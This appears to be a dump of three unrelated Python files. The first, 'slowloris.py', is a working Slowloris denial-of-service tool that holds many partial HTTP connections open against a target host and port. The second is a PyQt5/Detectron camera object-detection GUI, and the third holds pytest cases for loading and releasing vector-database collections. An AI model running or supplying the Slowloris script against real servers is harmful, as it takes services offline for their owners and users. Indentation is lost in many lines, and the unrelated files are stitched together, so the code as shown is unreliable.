source | python |
|---|---|
slowloris.py | import random
import time
import socket
from threading import Thread
# Import modules for SLOWLORIS flood
import tools.randomData as randomData
def SLOWLORIS_ATTACK(threads, attack_time, target):
    # Shared stop flag read by all worker threads
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("[#] Attack started for " + str(attack_time) + " seconds..")
threads_list = []
# SLOWLORIS flood
def slowloris_flood():
global FINISH
# Init socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(4)
        # Guard the connect so a refused/unreachable target doesn't kill the thread
        try:
            sock.connect((target_ip, target_port))
        except socket.error:
            print("[-] Connection failed..")
            return
        sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
        sock.send("User-Agent: {}\r\n".format(randomData.random_useragent()).encode("utf-8"))
        sock.send("{}\r\n".format("Accept-Language: en-US,en;q=0.5").encode("utf-8"))
        # Keep the connection alive: periodically send another partial header
        while not FINISH:
            try:
                sock.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
            except socket.error:
                print("[-] Failed..")
            else:
                print("[+] Sending to " + target)
# Start threads
for thread in range(0, threads):
print("[#] Starting thread " + str(thread))
t = Thread(target = slowloris_flood)
t.start()
threads_list.append(t)
# Sleep selected seconds
time.sleep(attack_time)
    # Signal all workers to stop, then wait for them
    FINISH = True
    for thread in threads_list:
        thread.join()
print("[!] SLOWLORIS attack stopped!")
|
camera.py | #!/usr/bin/python2
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'camara_ui.ui'
#
# Created by: PyQt5 UI code generator 5.5.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import sys
import cv2
import numpy as np
import threading
import time
import Queue
running = False
capture_thread = None
q = Queue.Queue(maxsize=10)
from collections import defaultdict
import argparse
import glob
import logging
import os
import math
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append('/home/vpa/github/caffe2/build')
sys.path.append('/home/vpa/github/cocoapi/PythonAPI')
from caffe2.python import workspace
from PIL import Image, ImageDraw, ImageFont
from core.config import assert_and_infer_cfg
from core.config import cfg
from core.config import merge_cfg_from_file
from utils.timer import Timer
import core.test_engine as infer_engine
import datasets.dummy_datasets as dummy_datasets
import utils.c2 as c2_utils
c2_utils.import_detectron_ops()
# OpenCL may be enabled by default in OpenCV3; disable it because it's not
# thread safe and causes unwanted GPU memory allocations.
cv2.ocl.setUseOpenCL(False)
_GRAY = (218, 227, 218)
_GREEN = (18, 127, 15)
_WHITE = (255, 255, 255)
def parse_args():
parser = argparse.ArgumentParser(description='End-to-end inference')
parser.add_argument(
'--cfg',
dest='cfg',
help='cfg model file (/path/to/model_config.yaml)',
default='/home/vpa/github/Detectron/configs/12_2017_baselines/e2e_faster_rcnn_R-50-FPN_2x.yaml',
type=str
)
parser.add_argument(
'--wts',
dest='weights',
help='weights model file (/path/to/model_weights.pkl)',
default='/home/vpa/models/detectron/e2e_faster_rcnn_R-50-FPN_2x.pkl',
type=str
)
# if len(sys.argv) == 1:
# parser.print_help()
# sys.exit(1)
return parser.parse_args()
def get_class_string(class_index, score, class_names):
class_text = class_names[class_index] if class_names is not None else \
'id{:d}'.format(class_index)
# return class_text + ' {:0.2f}'.format(score).lstrip('0')
return class_text
def vis_class(img, pos, class_str, theta, radius, font_scale=0.35):
"""Visualizes the class."""
x0, y0 = int(pos[0]), int(pos[1])
    # Disabled variant: prefix the bearing with a side hint
    # (右前方 = "front-right", 正前方 = "straight ahead", 左前方 = "front-left").
    # if theta > 0:
    #     thetaText = u' 右前方%d度' % math.fabs(theta)
    # elif theta == 0:
    #     thetaText = u' 正前方'
    # else:
    #     thetaText = u' 左前方%d度' % math.fabs(theta)
    thetaText = u'%d度' % (90 - theta)  # bearing in degrees (度)
    distText = u'%.2f米' % radius  # distance in meters (米)
    txt = class_str + thetaText + distText
# cv2 to pil
    cv2_im = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)  # OpenCV stores BGR while PIL expects RGB
pil_im = Image.fromarray(cv2_im)
# draw pil
    draw = ImageDraw.Draw(pil_im)  # draw directly onto the image canvas
    font = ImageFont.truetype("/usr/share/fonts/truetype/simhei.ttf", 15, encoding="utf-8")  # args: font file path, font size
    draw.text((x0, y0-15), txt, (0, 0, 0), font=font)  # args: position, text, fill color, font
# pil to cv2
img = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
#cv2.imshow("detect", img)
# Compute text size.
# txt = class_str
# font = cv2.FONT_HERSHEY_SIMPLEX
# ((txt_w, txt_h), _) = cv2.getTextSize(txt, font, font_scale, 1)
# Place text background.
# back_tl = x0, y0 - int(1.3 * txt_h)
# back_br = x0 + txt_w, y0
# cv2.rectangle(img, back_tl, back_br, _GREEN, -1)
# Show text.
# txt_tl = x0, y0 - int(0.3 * txt_h)
# cv2.putText(img, txt, txt_tl, font, font_scale, _GRAY, lineType=cv2.LINE_AA)
return img
def vis_bbox(img, bbox, thick=1, color=_GREEN):
"""Visualizes a bounding box."""
(x0, y0, w, h) = bbox
x1, y1 = int(x0 + w), int(y0 + h)
x0, y0 = int(x0), int(y0)
cv2.rectangle(img, (x0, y0), (x1, y1), color, thickness=thick)
return img
def computeaspect(bbox):
"""compute distance and aspect of the object ."""
u, v = (bbox[0] + bbox[2]) / 2.0, bbox[3]
x = 0.0230 * u - ((0.9996 * u - 550.3179) * (37.6942 * v - 2.2244e+06)) / (
1.6394e+03 * v - 4.1343e+05) - 12.9168
y = ((0.0070 * u - 1.6439e+03) * (37.6942 * v - 2.2244e+06)) / (
1.6394e+03 * v - 4.1343e+05) - 1.6046e-04 * u + 0.0902
theta = math.degrees(math.atan2(y, x))
radius = math.sqrt(x ** 2 + y ** 2)/1000
return theta, radius
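# Illustrative helper (an assumption, not in the original file): exercises the
# fixed-calibration mapping above with a made-up bounding box.
def _demo_computeaspect():
    theta, radius = computeaspect((100.0, 250.0, 300.0, 300.0))  # (x0, y0, x1, y1)
    print('bearing: %.1f deg, distance: %.2f m' % (theta, radius))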
def demo_vis_one_imageboxes_opencv(im, cls_boxes, thresh=[], show_box=False,dataset=None, show_class=False,
class_names=[], color_list=[], cls_sel=[],queue=[],frame=[],count=0,start_time=[]):
"""Constructs a numpy array with the detections visualized."""
box_list = [b for b in [cls_boxes[i] for i in cls_sel] if len(b) > 0]
if len(box_list) > 0:
boxes = np.concatenate(box_list)
else:
boxes = None
classes = []
# for j in range(len(cls_boxes)):
for j in cls_sel:
# print(len(cls_boxes[j]))
classes += [j] * len(cls_boxes[j])
if boxes is None or boxes.shape[0] == 0 or max(boxes[:, 4]) < min(thresh):
return im
# for i in sorted_inds:
for i, cls_id in enumerate(classes[0:]):
bbox = boxes[i, :4]
score = boxes[i, -1]
if score < thresh[cls_id]:
continue
theta, radius = computeaspect(bbox)
# show box (off by default)
if show_box:
im = vis_bbox(
im, (bbox[0], bbox[1], bbox[2] - bbox[0], bbox[3] - bbox[1]), color=color_list[cls_id])
# show class (off by default)
if show_class:
class_str = get_class_string(classes[i], score, class_names)
im = vis_class(im, (bbox[0], bbox[1], bbox[2], bbox[3]), class_str, theta, radius)
avg_fps = (count-4) / (time.time() - start_time)
cv2.putText(im, '{:s} {:.1f}/s'.format('fps', avg_fps), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255),
lineType=cv2.LINE_AA)
frame["img"] = im
# if queue.qsize() < 10:
# queue.put(frame)
# else:
# return
# break
return frame
def camera(cam, queue, width, height, fps, args):
global running
logger = logging.getLogger(__name__)
merge_cfg_from_file(args.cfg)
cfg.TEST.WEIGHTS = args.weights
cfg.NUM_GPUS = 1
assert_and_infer_cfg()
model = infer_engine.initialize_model_from_cfg()
dummy_coco_dataset = dummy_datasets.get_coco_dataset()
start_time = 0
count = 0
# class_names =[
# '__background__', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
# 'bus', 'train', 'truck']
# color_list=[[0,0,0],[255,0,0],[0,255,0],[0,0,255],[255,255,0],[0,255,255],[255,255,0],[255,0,255],[255,255,255]]
    class_names = [
        '__background__', u'人', u'自行车', u'车', u'摩托车', 'airplane',
        u'车', 'train', u'车']  # 人=person, 自行车=bicycle, 车=vehicle, 摩托车=motorcycle
color_list = [[0, 0, 0], [255, 0, 0], [0, 255, 0], [0, 0, 255], [255, 255, 0], [0, 0, 255], [255, 255, 0],
[255, 0, 255], [0, 0, 255]]
cls_sel = [1, 2, 3, 4, 6, 8]
cls_thresh = [1, 0.6, 0.5, 0.8, 0.5, 0.9, 0.7, 0.9, 0.5]
    logger.info(
        'Note: inference on the first image will be slower than the '
        'rest (caches and auto-tuning need to warm up)'
    )
capture = cv2.VideoCapture(cam)
capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
# capture.set(cv2.CAP_PROP_FPS, fps)
# size = (int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)), int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))
#print(cv2.__version__)
    while running:
        frame = {}
        ret, im = capture.read()
        if not ret:  # skip frames the camera failed to deliver
            continue
        count = count + 1
        if count == 5:  # start timing after the warm-up frames
            start_time = time.time()
# timers = defaultdict(Timer)
# # detect one image
with c2_utils.NamedCudaScope(0):
cls_boxes, _, _ = infer_engine.im_detect_all(
model, im, None, timers=None)
demo_vis_one_imageboxes_opencv(im, cls_boxes, thresh=cls_thresh, show_box=True, dataset=dummy_coco_dataset,
show_class=True, class_names=class_names, color_list=color_list, cls_sel=cls_sel,
queue=q,frame=frame,count=count,start_time=start_time)
queue.put(frame)
# frame["img"] = im
# if queue.qsize() < 20:
# queue.put(frame)
# else:
# break
# print(queue.qsize())
# if queue.qsize() >= 10:
# break
# print(queue.qsize())
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
class OwnImageWidget(QtWidgets.QWidget):
def __init__(self, parent=None):
super(OwnImageWidget, self).__init__(parent)
self.image = None
def setImage(self, image):
self.image = image
sz = image.size()
self.setMinimumSize(sz)
self.update()
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
if self.image:
qp.drawImage(QtCore.QPoint(0, 0), self.image)
qp.end()
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(2560, 1440)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(170, 160, 2000, 1200))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setObjectName("verticalLayout")
self.startButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(15)
self.startButton.setFont(font)
self.startButton.setObjectName("startButton")
self.verticalLayout.addWidget(self.startButton)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(0, 0, 180, 180))
self.label.setObjectName("logo")
jpg = QtGui.QPixmap('/home/vpa/github/Detectron_jdy/tools/logo2.jpg')
self.label.setPixmap(jpg)
MainWindow.setCentralWidget(self.centralwidget)
self.groupBox = QtWidgets.QGroupBox(self.verticalLayoutWidget)
self.groupBox.setObjectName("groupBox")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(10, 10, 2000, 1200))
self.widget.setObjectName("widget")
self.verticalLayout.addWidget(self.groupBox)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 789, 25))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(700, 60, 1000, 91))
font = QtGui.QFont()
font.setPointSize(25)
self.label.setFont(font)
self.label.setObjectName("label")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.startButton.clicked.connect(self.start_clicked)
self.window_width = self.widget.frameSize().width()
self.window_height = self.widget.frameSize().height()
self.ImgWidget = OwnImageWidget(self.widget)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.update_frame)
self.timer.start(1)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "目标检测系统"))  # "Object Detection System"
        self.startButton.setText(_translate("MainWindow", "开始检测"))  # "Start Detection"
        self.groupBox.setTitle(_translate("MainWindow", ""))
        self.label.setText(_translate("MainWindow", "天津大学视觉模式分析实验室目标检测系统"))  # "Tianjin University Vision Pattern Analysis Lab Object Detection System"
def start_clicked(self):
global running
running = True
capture_thread.start()
self.startButton.setEnabled(False)
        self.startButton.setText('准备检测')  # "Preparing to detect"
def update_frame(self):
if not q.empty():
            self.startButton.setText('正在检测')  # "Detecting"
frame = q.get()
img = frame["img"]
img_height, img_width, img_colors = img.shape
scale_w = float(self.window_width) / float(img_width)
scale_h = float(self.window_height) / float(img_height)
scale = min([scale_w, scale_h])
if scale == 0:
scale = 1
img = cv2.resize(img, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
height, width, bpc = img.shape
bpl = bpc * width
image = QtGui.QImage(img.data, width, height, bpl, QtGui.QImage.Format_RGB888)
self.ImgWidget.setImage(image)
def closeEvent(self, event):
global running
running = False
if __name__ == "__main__":
import sys
capture_thread = threading.Thread(target=camera, args=(0, q, 1000, 800, 30, parse_args()))
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
test_load_collection.py | import logging
import threading
import pytest
from utils import *
from constants import *
uid = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": default_top_k, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
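# The structure above follows the old (pre-2.0) Milvus search DSL: a boolean
# "must" clause wrapping a "vector" sub-query keyed by field name, with topk,
# metric_type and index-specific search params ("nprobe" for IVF indexes).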
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
'''
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
'''
connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
'''
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
'''
ids = connect.insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_empty_collection(self, connect, collection):
'''
target: test load collection
method: no entities in collection, load collection with correct params
expected: load success
'''
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_dis_connect(self, dis_connect, collection):
'''
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.level(2)
def test_release_collection_dis_connect(self, dis_connect, collection):
'''
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
'''
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.level(2)
def test_load_collection_not_existed(self, connect, collection):
collection_name = gen_unique_str(uid)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.level(2)
def test_release_collection_not_existed(self, connect, collection):
collection_name = gen_unique_str(uid)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method:
expected: raise exception
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_after_load_release(self, connect, collection):
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
def test_load_collection_repeatedly(self, connect, collection):
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.level(2)
def test_load_release_collection(self, connect, collection):
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.insert(collection_name, default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: load collection failed
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.load_collection(collection)
# TODO
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: i don't know
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query, partition_names=[default_tag])
res = connect.search(collection, default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
ids = connect.insert(collection, default_entities)
assert len(ids) == default_nb
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, default_single_query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into partitions, search empty after load partitions and release collection
expected: search result empty
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
# assert len(res[0]) == 0
class TestReleaseAdvanced:
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
future = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected:
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected:
"""
connect.insert(collection, default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected:
"""
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
# assert len(res[0]) == 0
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
        method: insert and flush, load collection, release the collection while the index is being built
expected:
"""
pass
    def _test_release_collection_during_dropping_index(self, connect, collection):
        """
        target: test release collection during dropping index
        method: insert, create index and flush, load collection, release the collection while the index is being dropped
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.level(2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
    The following cases are used to test `load_partitions` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_after_index(self, connect, collection, get_simple_index):
        '''
        target: test load partition, after index created
        method: insert and create index, load partition with correct params, then search in it
        expected: no error raised, search returns top_k results
        '''
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
search_param = get_search_param(get_simple_index["index_type"])
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq=1, search_params=search_param)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
        '''
        target: test load binary_collection partition, after index created
        method: insert and create index, load the partition with correct params
        expected: no error raised
        '''
connect.create_partition(binary_collection, default_tag)
ids = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.skip("xige-16-search-without-insert")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_empty_partition(self, connect, collection):
        '''
        target: test load empty partition
        method: no entities in partition, load the partition with correct params
        expected: load success, search returns empty
        '''
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.level(2)
    def test_load_partition_dis_connect(self, connect, dis_connect, collection):
        '''
        target: test load partition, without connection
        method: load partition with correct params, with a disconnected instance
        expected: load raise exception
        '''
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.level(2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
        '''
        target: test release partition, without connection
        method: release partition with correct params, with a disconnected instance
        expected: release raise exception
        '''
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_not_existed(self, connect, collection):
partition_name = gen_unique_str(uid)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_not_existed(self, connect, collection):
partition_name = gen_unique_str(uid)
try:
connect.release_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release collection without load
method:
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.level(2)
def test_load_release_after_drop(self, connect, collection):
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
